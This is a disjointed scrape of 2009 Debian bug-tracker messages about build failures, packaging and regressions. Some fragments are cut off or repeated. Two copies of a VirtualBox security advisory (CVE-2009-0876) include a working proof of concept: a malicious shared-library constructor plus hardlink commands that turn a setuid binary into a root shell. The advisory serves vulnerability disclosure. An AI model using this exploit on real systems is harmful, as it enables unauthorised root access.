The SOA-related changes do not make the attack significantly harder,
so the issue is still present.

we had a similar problem with ffmpeg on mips, which was fixed in
0.svn20080206-13. From the changelog entry:

   [Thiemo Seufer]
   * compile shared libavcodec explicitly with $(PIC), since gcc-4.3
 mips/mipsel needs an explicit PIC flag for shared library
 code.
 .
 Until gcc-4.2 Linux/MIPS always used PIC code, even for executables.
 This changed with gcc-4.3, and with it the compiler default changed
 to non-PIC. As a result, -fPIC now needs to be explicitly supplied
 for shared library builds.
 .
 (Closes: #498216, 498647, 498397)

Maybe there is a similar problem in mplayer's configure script? The fix
was after all in ffmpeg's configure script, which is reimplemented in
mplayer.

But TBH, I currently have the fear that the problem could be one of our
patches that we carry, namely 30link-system-ffmpeg.patch. At least that
patch has a direct effect on the gcc call that is failing.

Could some of the mips porters please try to build the mplayer package
with that patch disabled, and send the buildlog to this bug? This will
result in not using the system ffmpeg but the internal copy. But this
would at least verify if the patch is buggy or not.

Bug#516218: getaddrinfo not working while gethostbyname works

2009-03-17 Thread Andrew Pimlott
My DSL router also triggered this issue. I just want to add the note
that for me, getaddrinfo does occasionally return correct results,
indicating that the flakiness of the DNS server is timing dependent.
What a maddening problem to diagnose!

Bug#512463: intend to NMU

2009-03-17 Thread dann frazier
usertag 512463 + intend-to-nmu
thanks

hey,
  As this bug has been open with a patch for over a month and without
a rejection from the maintainer, I intend to NMU the associated package
in a week's time (or sooner, if requested by the maintainer).

If you do not wish for this NMU to occur, please send a follow-up in
the bug report stating as such or, better yet, fix it in an MU :)

Unless you request otherwise, any NMUs I upload will be to the DELAYED
queue, so you will have an additional week to supersede my upload with
an MU to prevent it from entering unstable.

I fixed this and pushed out a new tarball:
http://cola.tuxfamily.org/releases/?C=N&O=D
cola-1.3.5.44-src.tar.gz

Here's the commit diff:
http://github.com/davvid/git-cola/commit/61cff60a6970afbed3c3cd3922303b18edb891a8

This won't be a problem in the future when cola starts using a
private path for its internal python modules, but until then
this should make things happy.

I tested the latest code on debian/testing and it seems to do
the right thing now.

Thanks for your help!

Awesome, okay I'll work on getting this fixed soon.

I've cc'd cola's debian package maintainer in case there's
anything that needs to be done on the packaging front to
account for the path change from using
/usr/lib/python2.*/site-packages/cola to
/usr/share/cola/lib for cola's private modules.

BTW I have a fix for the bug regarding cola breaking
help('modules') so I'll probably be rolling a new release
tonight to address it.

Thanks for the help!

Sorry, I was thinking that upstream objected to -fPIC *at all*.

I provided sample code for doing so which you trimmed in your reply.

Also in the sample code I provided.

You might be trying to imply that you want a solution that solves this
for upstream as well as for Debian, and that my fix only affects
Debian builds, and that's fine. The impetus for this email was just to
note that I'd tested the submitter's patch and found that it didn't
work.

Yes, but the submitter mentioned that

Since no rationale was given, I am reluctant to do this without
discussing it with upstream. BTW, I would change that to

CFLAGS += -fPIC

at the top of the makefile (otherwise it would eat -O2 -Wall and
similar).

I did some research and guess I found a solution. You can find the patch
in the package SVN repo. I used build Open MPI successfully on sparc. If
you have access to a sparc box, it would be great if you could give it a
try. Thanks in advance!

Bug#518281: patch insufficient

2009-03-17 Thread dann frazier
I tested the initial patch on paer.debian.org, a parisc machine.
I found that it didn't work. However, this one did:

If this needs to be arch-specific it could probably be changed to
something like:

DEB_HOST_ARCH := $(shell dpkg-architecture -qDEB_HOST_ARCH)
ifeq ($(DEB_HOST_ARCH),hppa)
 CFLAGS+="-fPIC"
endif

build:
dh $@ --before configure
CFLAGS="$(CFLAGS)" ./waf --nocache configure --prefix=/usr

By the way - I noticed that platform.architecture() == 'parisc64' on
paer, so that may have been the problem with the initial patch.

Bug#520189: nspluginwrapper does not work on kernel 2.6.26

2009-03-17 Thread Ari Pollak
Package: nspluginwrapper
Version: 1.3.0-1
Severity: serious

nspluginwrapper currently does not work at all on my system; I believe
this has to do with a kernel 2.6.27-specific flag passed to socket()
now, but I'm not entirely sure. This is especially bad given that the

should work regardless of the particular 2.6 kernel version.

--- Begin Message ---
Package: request-tracker3.6
Version: 3.6.7-4
Severity: serious
Justification: maintainer's opinion

By default 'apt-get install request-tracker3.6' will pull in
rt3.6-db-sqlite as the first choice, and users opting for automatic
database management (dbconfig-common) will get an SQLite installation
with no further (database-related) questions.

This is unfortunate because upstream considers the SQLite database
backend unsupported and intended for development and testing purposes
only. The default database choice was thus a bad call on my part, as I
have recently realized.

My rationale for the choice was to get a working installation
automatically, and SQLite is just about the only way to do that currently.
It mostly works and we have received no bug reports about it, but upstream
says it has a few known problems.

While some people will probably realize they should use MySQL or
PostgreSQL for production installations, this leaves the rest with an
installation that's officially unsupported. And naturally many of them
are going to go to the upstream rt-users list for support anyway.

It is too late to change the functionality for Lenny, the only thing
we can do is to add documentation.

As discussed with upstream, the plan is to insert prominent warnings
in the request-tracker3.6 and rt3.6-db-sqlite package descriptions and
README.Debian.

Also, we intend to put a recipe for mysql/pg migration on the web at
http://pkg-request-tracker.alioth.debian.org/ and make README.Debian
point there. This way we can improve the recipe even after the release
and upstream can refer the end users there.

I'm setting the initial severity to 'serious': not getting these
changes in lenny means we need to discuss if dropping RT from the release
altogether is the next best alternative. We intend to get a fixed package
in sid RSN, so hopefully it doesn't come to that.

Bug#520187: ogdi-dfsg: FTBFS: No libproj-dev

2009-03-17 Thread Kurt Roeckx
Source: ogdi-dfsg
Version: 3.2.0~beta2-1

Hi,

Your package is build depending on libproj-dev | proj, and
libproj-dev does not exist.

This does not work. The buildds will only consider the first
alternative, so libproj-dev.

Either drop the libproj-dev, or change the order. But I don't
see why you have the build dependency on libproj-dev.

No, I just read your email as the upload was kind of urgent. If it is,
I'd propose we go for alpha and sparc using LAM. If it's not, I can fix
alpha and sparc in openmpi and upload mpi-defaults with alpha and sparc
using Open MPI. I'd prefer this, though I do not know if it's reasonable
since we could also go back to Open MPI with a later upload.

What is your preferred option?

Best regards
Manuel

If, as you say, the sparc failure is expected to be fixed soon, I don’t
understand if there would be any problem with uploading with the
alpha/LAM change now, keeping sparc with openmpi. If you are concerned
that mpi-defaults will fail to build on sparc, that should not be a
concern: can get built when openmpi is built on sparc, but in the

It seems you're missing a build dependency on atleast libglade2-dev,

Package: texlive-base
Version: 2007.dfsg.2-1
Severity: serious
Justification: breaks package builds

Since the upload of texlive-base version 2007.dfsg.2-1, I've started
getting numerous build failures in packages that built before that
upload (in particular, after the tex-common and texlive-extra updates
last week, things were still working). For example, from my pbuilder
build log for autogen:

/usr/bin/make -C doc autogen.ps info
make[1]: Entering directory `/tmp/buildd/autogen-5.9.7/doc'
TEXINPUTS="../config:$TEXINPUTS" \
MAKEINFO='/bin/sh /tmp/buildd/autogen-5.9.7/config/missing --run
makeinfo  -I../autoopts -I../autoopts -I .' \
texi2dvi autogen.texi
This is pdfTeXk, Version 3.141592-1.40.3 (Web2C 7.5.6)
 %&-line parsing enabled.
I can't find the format file `etex.fmt'!
kpathsea: Running mktexfmt etex.fmt
/usr/bin/texi2dvi: texinfo.tex appears to be broken, quitting.
make[1]: *** [autogen.dvi] Error 1
make[1]: Leaving directory `/tmp/buildd/autogen-5.9.7/doc'
make: *** [build-stamp] Error 2
dpkg-buildpackage: failure: debian/rules build gave error exit status 2

(Never mind the local versions I have with +pb1 etc. -- I've verified
this in a vanilla pbuilder chroot as well.)

Nope. I guess it was a little too much hacking this weekend. Only the
ABI is effected, so recompiling will do the trick. No patches involved.

As for mpi-defaults, I will delay the upload until the build issue on
sparc is solved, which I hope will be soon(ish). The fix seem quite
straight forward and I'll be testing it tomorrow night. A porter machine
is prepared already.

debarchiver's $help string now hardcodes the default values it reports
but neglects to escape the double quotes around them, leading to a
pile of syntax errors preventing execution:

Feel free to do so if you like; usually, they're very responsive and I
expect an answer before the weekend. If the SONAME is not changed but
faked by a package name change, this is not mission-critical, is it?

Thanks. The problem was a wrong variable name used to add include paths of
libxml2. cmake 2.6.3 changed its behaviour slightly and removed the old
version of the variable.
An updated package is currently in mentors.

I've checked with pbuilder:

   - works on i386, amd64
   - fails on powerpc, sparc

Fix is easy, it's a typo in the big-endian ifdef branch. Patch attached.

Okay, thanks.

I've applied roughly the same docs (plus the content from the web page)
in request-tracker3.8. Probably best to open a new wishlist bug if you
want to persue the dbconfig-common prompting business.

Cheers,

Hello,

linphone build-depends on gnome-applets, but this build-dependency (as
confirmed with the GNOME maintainers) does not make any sense: with
libpanel-applet2-dev (which is already in linphone’s build-dependency
list) should be enough.

This is particularly grave since linphone is now failing to build due to
uninstallability of gnome-applets. It’d be great if you could do a quick
upload doing the build-dependency.

I’ve verified that linphone builds fine without gnome-applets installed.
Please let me know if you need a NMU.

Thanks,

default ones. Nothing fancy :) And remember it work with emacs, so
normally I do not need to install a new font package.

note that Debian should use this for at least some architectures,
otherwise the package itself may very well be uninstallable, at least
early in one's computing day when not enough entropy has built up.

remember having that problem before, which I solved just changing the fonts.

Just for the records. After updating my texlive-base to the
problematic version I found in my /var/lib/texmf/web2c/fmtutil.cnf a
message telling my that /etc/texmf/fmt.d/10texlive-base.cnf was
neglected because when building it, because of a missing file in
/var/lib/tex-common/fmtutil-cnf . Running update-fmtutil another time
corrected my fmtutil.cnf and now fmtutil-sys can again generate the
format for tex.fmt.

Maybe we generate the fmtutil.cnf too early???

This will break other clients, too. For instance, a BIND forwarder
without source port randomization, who happens to have multiple
queries in flight.

Has it been verified that the second DNS packet actually leaves the
box? I think there was word of a kernel bug leading to dropped UDP
packets which might cause this.

Yes. As you can read in the comment made by Byron Clark
(http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=519148#40)
the problem is caused by the upgrade of libglib2.0-0. He wrote

Bug#520150: [kde] Regression: accent are not displayed

2009-03-17 Thread Bastien ROUCARIES
Package: kde
Version: 5:48
Severity: serious

I have upgraded this week my testing system (last update from five day ago).
Since this date accent are not correctly typed on kde application (and qt).
They are typed by two white box but they are correctly displayed for instance
on localization box and by text file under konqueror vievwer. MLoreover under
emacs it work correctly.

To test switch to a french keyboard and type 2 normally it will display an e
cute. Accent are really important in french for instance a and agrave are two
different word, one is the verb to have, the other means to. Therefore it is a
serious bug, that render my desktop completly broken.

Regards

Bastien

Bug#517975: pdnsd: package update overrides configuration

It would be nice if you do :). Maybe you faced
similar discussions in the past?

> background for...would be a good idea.

Looks like either I'm missing something between
the lines of the Debian Policy or the Policy is
insufficient regarding this particular matter:
namely, which file _is_ configuration file and
which one isn't.

IMHO, the current Policy supports my opinion
better, and lacks ground for Pierre's one. If we
want to give more freedom to Debian package
maintainer, the Policy should be modified here
(and Pierre will be free to put anything he likes
under /usr, call it "internal package file", stick
"do not touch!" sign on it and then say "Full
stop"). :)

The whole issue is not technical, you know, I have
absolutely no problem configuring/using/upgrading
pdnsd, so it's just a matter of advocacy,
definitions and arguments. Regarding the latter,
I'm getting short of them, and without external
intervention from you or other Debian developers,
this discussion will lose sense.

How did you do it? With

I just now installed texlive-latex-base in a clean pbuilder and it
worked without any problems, there was tex.log and tex.fmt ...

Very strange.

Best wishes

Bug#520042: texlive-base: Fails to generate formats on new installation(?)

2009-03-17 Thread Daniel Schepler
After installing the build dependencies for gnuplot in a pbuilder
chroot, /var/lib/texmf/web2c/pdftex has no file etex.log OR etex.fmt.
The only files in that directory are latex.log, latex.fmt, pdflatex.log,
pdflatex.fmt. And there is no directory /var/lib/texmf/web2c/tex at
all. Even when I run "mktexfmt --byfmt etex", neither etex.log nor
etex.fmt is created anywhere within the chroot.

And I notice that by the timestamps in /var/lib/texmf/web2c/pdftex in
the root filesystem outside the chroot, {etex,pdfetex,pdftex}.{fmt,log}
are about 5 days older than {latex,pdflatex}.{fmt,log}.

Hi,

It looks like the current version of .frozen-bubble/rc is identical to
the version found by ext3grep. So, I guess the answer is no, I don't

Nevertheless, I've attached the version that ext3grep found.

 | I hadn’t noticed, thanks for telling me. There is an unfortunate problem

It is still unclear wether we can get rid of the kde3 libraries for squeeze. I
hope it is, but I don't think it is realistic.

But mimelib should be enough self-containing to not require any parts of KDE -
and mimelib don't expose any parts of kde abi to the outside. It should be
doable, it is just a matter of doing it.

Of course it would mean maintaining another package but you should be

Thanks for the pointer. Packaging mimelib as a seperate source package
in debian seems like a good solution to bug#514294.

Do you intend to upload it soon?

on final issue remains:
I saw that the package build-depends on kdelibs4, which is from kde3.
But I thought that the bugreport was filed by Sune to get rid of kde3 in

Is this build dependency required at all? An if it is, how do you intend

Hmm, probably not, that was probably a mistake on my part. I won't be
uploading it at all as I really have no interest in maintaining it, I
was just trying to help out. It should be an easy package to maintain
as upstream is pretty much inactive I think.

Since the same version is in testing, this bug will not prevent
migration of new versions to testing.

The first step you should do is prevent the generation of binary
packages on powerpc. There are a few ways to do that:
- Restrict the arches list in the control file. This can make
  sense if upstream says it's not supported, and the source
  of the problem is this package. It does not make sense if this
  is a bug in fpc.
- Run a test during the build process that tries to detect if
  it's working or not, and make it fail during the build process,
  if it doesn't work.
- Have a list of arches that work in your rules file, and use
  that to decide if you continue buiding or not.

You can close this bug in the package that prevents the
generation of the binary package on powerpc.

The next step is asking ftp-master to remove the binary package
for powerpc from unstable. As long as the binary package stays
it unstable, the scripts will assume something is wrong with the
powerpc version and prevent migration to testing.

When both those things have been done, the new version should
migrate to testing.

You can either ask the buildd maintainers to schedule a binNMU
to try with the new version of fpc, or upload a new version. Then
you probably want to ask the submitter of this bug to try again.

Bug#519148: gnucash: More information: this configuration still works OK

2009-03-17 Thread Robert E. Riding
Package: gnucash
Followup-For: Bug #519148

This machine is not updated as frequently as the others I reported not
working. Gnucash starts and runs fine on this machine, using the file
copied from the non-working machine. Some software or combination of
software updated recently seems to cause this Segfault.

I apologize for the fragmented nature of my reports.

Thanks,
R E Riding.

Okay; I think it’s reasonable to wait, as long as we make sure it gets
addressed at some point. Maybe we should open a separate bug report for
it?

Ok.

Uhm, what kind of patches are needed? Has the API changed as well
between 1.2 and 1.3?

It is better to coordinate with the debian-rele...@lists.d.o list, I’ll
be reading that anyway.

Thanks for the pointer. Packaging mimelib as a seperate source package
in debian seems like a good solution to bug#514294.

Do you intend to upload it soon?

on final issue remains:
I saw that the package build-depends on kdelibs4, which is from kde3.
But I thought that the bugreport was filed by Sune to get rid of kde3 in
the long term.
Is this build dependency required at all? An if it is, how do you intend
to workaround it once kde3 will be removed from debian/unstable?

greetings,
 jonas

Package: virtualbox-ose
Version: 2.1.4-dfsg-1
Severity: critical
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for virtualbox-ose.

CVE-2009-0876[0]:
| Unspecified vulnerability in Sun xVM VirtualBox 2.0.0, 2.0.2, 2.0.4,
| 2.0.6r39760, 2.1.0, 2.1.2, and 2.1.4r42893 on Linux allows local users
| to gain privileges via unknown vectors related to "certain packages."

Quoting SpanKY :
"hardlinks on Linux preserve permission, including set*id bits, and can be
created by non-root users. virtualbox attempts to perform some sanity checks on
the dir the binary exists in (presumably to prevent privilege escalation),
however that is done after the constructors in shared libs are run. that means
any library a virtualbox binary links against is an attack vector.

the constructor isnt the only attack vector ... you could also override any of
the standard C library functions that virtualbox would call during its startup.
like open() or stat() or ...

there really isnt many workarounds available here if DT_RPATH:$ORIGIN is
continued to be used. perhaps making a small dedicated partition (loopback or
whatever) and storing the binaries on there because hardlinks cannot go across
partitions.

simple example:

$ id -u
1002

$ cat test.c
#include
#include
__attribute__((constructor))
void awesome(void)
{
char *argv[] = { "sh", NULL };
extern char *environ;
syscall(SYS_setuid, 0);
syscall(SYS_execve, "/bin/sh", argv, environ);
}

$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2

$ ls -l /opt/VirtualBox/VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox

$ ln /opt/VirtualBox/VirtualBox

$ ls -l VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox

$ ./VirtualBox
./VirtualBox: /home/vapier/libdl.so.2: no version information available
(required by ./VirtualBox)
sh-4.0# whoami
root"

Upstream patches are available on:
http://www.virtualbox.org/changeset/17171
http://www.virtualbox.org/changeset/17169
http://www.virtualbox.org/changeset/17168

Debian lenny is not affected by this problem as the binaries are not setuid 0.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

Bug#520133: linphone: spurious build-dependency on gnome-applets

2009-03-17 Thread Adeodato Simó
Package: linphone
Version: 3.0.0-2
Severity: serious

Hello,

linphone build-depends on gnome-applets, but this build-dependency (as
confirmed with the GNOME maintainers) does not make any sense: with
libpanel-applet2-dev (which is already in linphone’s build-dependency
list) should be enough.

This is particularly grave since linphone is now failing to build due to
uninstallability of gnome-applets. It’d be great if you could do a quick
upload doing the build-dependency.

I’ve verified that linphone builds fine without gnome-applets installed.
Please let me know if you need a NMU.

Thanks,

Bug#520126: virtualbox-ose: CVE-2009-0876 insecure shared lib loading leads to local privilege escalation

2009-03-17 Thread Nico Golde

$ id -u
1002

$ cat test.c
#include
#include
__attribute__((constructor))
void awesome(void)
{
char *argv[] = { "sh", NULL };
extern char *environ;
syscall(SYS_setuid, 0);
syscall(SYS_execve, "/bin/sh", argv, environ);
}

$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2

$ ls -l /opt/VirtualBox/VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox

$ ln /opt/VirtualBox/VirtualBox

$ ls -l VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox

$ ./VirtualBox
./VirtualBox: /home/vapier/libdl.so.2: no version information available
(required by ./VirtualBox)
sh-4.0# whoami
root"

Upstream patches are available on:
http://www.virtualbox.org/changeset/17171
http://www.virtualbox.org/changeset/17169
http://www.virtualbox.org/changeset/17168

Debian lenny is not affected by this problem as the binaries are not setuid 0.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

I remember checking this with blank password and other random typed passwords
and it didn't work.
And yes, I ran pam-auth-update as soon I found what was going on.
Thanks Steve,
